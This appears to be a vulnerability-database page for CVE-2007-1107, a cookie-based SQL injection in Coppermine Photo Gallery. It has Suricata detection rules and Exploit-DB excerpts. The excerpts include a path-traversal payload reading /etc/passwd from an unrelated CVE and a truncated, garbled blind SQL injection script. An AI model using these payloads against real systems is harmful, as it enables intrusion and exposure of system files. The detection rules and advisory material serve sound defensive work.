CVE-2007-1107
published 2007-02-26CVE-2007-1107: SQL injection vulnerability in thumbnails.php in Coppermine Photo Gallery (CPG) 1.3.x allows remote authenticated users to execute arbitrary SQL commands via a…
PriorityP338high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
2.13%
79.6th percentile
SQL injection vulnerability in thumbnails.php in Coppermine Photo Gallery (CPG) 1.3.x allows remote authenticated users to execute arbitrary SQL commands via a cpg131_fav cookie. NOTE: it was later reported that 1.4.10, 1.4.14, and other 1.4.x versions are also affected using similar cookies.
Affected
4 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| coppermine | coppermine_photo_gallery | — | — |
| coppermine | coppermine_photo_gallery | — | — |
| coppermine | coppermine_photo_gallery | — | — |
| coppermine | coppermine_photo_gallery | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Suricata
ET WEB_SPECIFIC_APPS Coppermine Photo Gallery (CPG) SQL Injection Attempt -- thumbnails.php cpg131_fav SELECT
suricata·2010-07-30·CVSS 7.5
CVE-2007-1107 [HIGH] ET WEB_SPECIFIC_APPS Coppermine Photo Gallery (CPG) SQL Injection Attempt -- thumbnails.php cpg131_fav SELECT
ET WEB_SPECIFIC_APPS Coppermine Photo Gallery (CPG) SQL Injection Attempt -- thumbnails.php cpg131_fav SELECT
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Coppermine Photo Gallery (CPG) SQL Injection Attempt -- thumbnails.php cpg131_fav SELECT"; flow:established,to_server; http.uri; content:"/thumbnails.php?"; nocase; content:"cpg131_fav="; nocase; content:"SELECT"; nocase; content:"FROM"; nocase; distance:0; reference:cve,CVE-2007-1107; reference:url,www.milw0rm.com/exploits/3371; classtype:web-application-attack; sid:2004809; rev:9; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_10, mitre_tact
Suricata
ET WEB_SPECIFIC_APPS Coppermine Photo Gallery (CPG) SQL Injection Attempt -- thumbnails.php cpg131_fav ASCII
suricata·2010-07-30·CVSS 7.5
CVE-2007-1107 [HIGH] ET WEB_SPECIFIC_APPS Coppermine Photo Gallery (CPG) SQL Injection Attempt -- thumbnails.php cpg131_fav ASCII
ET WEB_SPECIFIC_APPS Coppermine Photo Gallery (CPG) SQL Injection Attempt -- thumbnails.php cpg131_fav ASCII
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Coppermine Photo Gallery (CPG) SQL Injection Attempt -- thumbnails.php cpg131_fav ASCII"; flow:established,to_server; http.uri; content:"/thumbnails.php?"; nocase; content:"cpg131_fav="; nocase; content:"ASCII("; nocase; content:"SELECT"; nocase; distance:0; reference:cve,CVE-2007-1107; reference:url,www.milw0rm.com/exploits/3371; classtype:web-application-attack; sid:2004813; rev:9; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_10, mitre_tact
Suricata
ET WEB_SPECIFIC_APPS Coppermine Photo Gallery (CPG) SQL Injection Attempt -- thumbnails.php cpg131_fav INSERT
suricata·2010-07-30·CVSS 7.5
CVE-2007-1107 [HIGH] ET WEB_SPECIFIC_APPS Coppermine Photo Gallery (CPG) SQL Injection Attempt -- thumbnails.php cpg131_fav INSERT
ET WEB_SPECIFIC_APPS Coppermine Photo Gallery (CPG) SQL Injection Attempt -- thumbnails.php cpg131_fav INSERT
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Coppermine Photo Gallery (CPG) SQL Injection Attempt -- thumbnails.php cpg131_fav INSERT"; flow:established,to_server; http.uri; content:"/thumbnails.php?"; nocase; content:"cpg131_fav="; nocase; content:"INSERT"; nocase; content:"INTO"; nocase; distance:0; reference:cve,CVE-2007-1107; reference:url,www.milw0rm.com/exploits/3371; classtype:web-application-attack; sid:2004811; rev:9; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_10, mitre_tact
Suricata
ET WEB_SPECIFIC_APPS Coppermine Photo Gallery (CPG) SQL Injection Attempt -- thumbnails.php cpg131_fav DELETE
suricata·2010-07-30·CVSS 7.5
CVE-2007-1107 [HIGH] ET WEB_SPECIFIC_APPS Coppermine Photo Gallery (CPG) SQL Injection Attempt -- thumbnails.php cpg131_fav DELETE
ET WEB_SPECIFIC_APPS Coppermine Photo Gallery (CPG) SQL Injection Attempt -- thumbnails.php cpg131_fav DELETE
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Coppermine Photo Gallery (CPG) SQL Injection Attempt -- thumbnails.php cpg131_fav DELETE"; flow:established,to_server; http.uri; content:"/thumbnails.php?"; nocase; content:"cpg131_fav="; nocase; content:"DELETE"; nocase; content:"FROM"; nocase; distance:0; reference:cve,CVE-2007-1107; reference:url,www.milw0rm.com/exploits/3371; classtype:web-application-attack; sid:2004812; rev:9; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_10, mitre_tact
Suricata
ET WEB_SPECIFIC_APPS Coppermine Photo Gallery (CPG) SQL Injection Attempt -- thumbnails.php cpg131_fav UNION SELECT
suricata·2010-07-30·CVSS 7.5
CVE-2007-1107 [HIGH] ET WEB_SPECIFIC_APPS Coppermine Photo Gallery (CPG) SQL Injection Attempt -- thumbnails.php cpg131_fav UNION SELECT
ET WEB_SPECIFIC_APPS Coppermine Photo Gallery (CPG) SQL Injection Attempt -- thumbnails.php cpg131_fav UNION SELECT
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Coppermine Photo Gallery (CPG) SQL Injection Attempt -- thumbnails.php cpg131_fav UNION SELECT"; flow:established,to_server; http.uri; content:"/thumbnails.php?"; nocase; content:"cpg131_fav="; nocase; content:"UNION"; nocase; content:"SELECT"; nocase; distance:0; reference:cve,CVE-2007-1107; reference:url,www.milw0rm.com/exploits/3371; classtype:web-application-attack; sid:2004810; rev:9; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_1
Suricata
ET WEB_SPECIFIC_APPS Coppermine Photo Gallery (CPG) SQL Injection Attempt -- thumbnails.php cpg131_fav UPDATE
suricata·2010-07-30·CVSS 7.5
CVE-2007-1107 [HIGH] ET WEB_SPECIFIC_APPS Coppermine Photo Gallery (CPG) SQL Injection Attempt -- thumbnails.php cpg131_fav UPDATE
ET WEB_SPECIFIC_APPS Coppermine Photo Gallery (CPG) SQL Injection Attempt -- thumbnails.php cpg131_fav UPDATE
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Coppermine Photo Gallery (CPG) SQL Injection Attempt -- thumbnails.php cpg131_fav UPDATE"; flow:established,to_server; http.uri; content:"/thumbnails.php?"; nocase; content:"cpg131_fav="; nocase; content:"UPDATE"; nocase; content:"SET"; nocase; distance:0; reference:cve,CVE-2007-1107; reference:url,www.milw0rm.com/exploits/3371; classtype:web-application-attack; sid:2004815; rev:9; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_10, mitre_tacti
Exploit-DB
ACGVAnnu 1.3 - 'acgv.php?rubrik' Local File Inclusion
exploitdb·2007-05-07
CVE-2007-2560 ACGVAnnu 1.3 - 'acgv.php?rubrik' Local File Inclusion
ACGVAnnu 1.3 - 'acgv.php?rubrik' Local File Inclusion
---
# BeyazKurt - [email protected]
#
# ACGV Annu (rubrik) Local File Inclusion Exploit
#
# Lamerler ortada kol geziyo aman dikkat ! Tr0jan kazasına denk gelmeyin !!
#
# Www.HackSafety.Com // Hackingde yeni bir çağ ...
#
# HackSafety.Com & WorldHackerz.Net KardeÅŸliÄŸi...
#
# rerere rararara bjk bjk MUAHAHAH
#
# Fincanı taştan oyarlar amanın oyarlar beşiktaşa böyle ... bjk'e böyle ... !!
#
# Download : http://www.phpscripts-fr.net/scripts/download.php?id=1107
/theme/acgv.php?rubrik=../../../etc/passwd%00
# milw0rm.com [2007-05-07]
Exploit-DB
Coppermine Photo Gallery 1.3.x - Blind SQL Injection
exploitdb·2007-02-24
CVE-2007-1107 Coppermine Photo Gallery 1.3.x - Blind SQL Injection
Coppermine Photo Gallery 1.3.x - Blind SQL Injection
---
";
$j = 1; $user = "";
while(!strstr($user,chr(0))){
for($x=0;$x ";
$a = 1; $pass = "";
while(!strstr($pass,chr(0))){
for($i=0;$iMSN: [email protected] ..xD\n";
echo "www.zonartm.org/blog/s0cratex\n";
echo "plexinium.com comming soon
# milw0rm.com [2007-02-24]
No writeups or analysis indexed.
http://osvdb.org/33133http://securityreason.com/securityalert/2297http://www.securityfocus.com/archive/1/461158/100/0/threadedhttp://www.securityfocus.com/bid/22709http://www.securityfocus.com/bid/27372https://exchange.xforce.ibmcloud.com/vulnerabilities/32688https://exchange.xforce.ibmcloud.com/vulnerabilities/39806https://www.exploit-db.com/exploits/3371https://www.exploit-db.com/exploits/4950https://www.exploit-db.com/exploits/4961http://osvdb.org/33133http://securityreason.com/securityalert/2297http://www.securityfocus.com/archive/1/461158/100/0/threadedhttp://www.securityfocus.com/bid/22709http://www.securityfocus.com/bid/27372https://exchange.xforce.ibmcloud.com/vulnerabilities/32688https://exchange.xforce.ibmcloud.com/vulnerabilities/39806https://www.exploit-db.com/exploits/3371https://www.exploit-db.com/exploits/4950https://www.exploit-db.com/exploits/4961
2007-02-26
Published